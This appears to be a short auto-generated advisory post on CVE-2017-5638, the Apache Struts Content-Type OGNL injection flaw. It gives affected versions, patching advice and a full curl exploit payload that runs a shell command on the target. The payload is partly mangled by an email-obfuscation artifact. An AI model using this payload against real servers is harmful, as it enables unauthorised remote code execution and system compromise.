Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The exploit is triggered by a malformed `Content-Type` HTTP header. When a request is sent with a specially crafted `Content-Type` value that contains malicious OGNL expressions, the flawed error handling mechanism in the parser incorrectly evaluates this input. Instead of treating it as a string, the parser interprets the OGNL code. This allows an unauthenticated attacker to achieve remote code execution by submitting the malicious header, which is then executed on the server with the application’s privileges, leading to a full compromise of the system.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: 2017-03-10

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/action`

How Exploit:

Craft malicious Content-Type header.

Send HTTP request.

OGNL expression execution.

System command injection.

Protection from this CVE

Upgrade to Struts 2.3.32 or 2.5.10.1.

Apply vendor patch immediately.

Use input validation filters.

Deploy Web Application Firewall.

Impact:

Remote Code Execution.

Full System Compromise.

Data Theft.

Service Disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top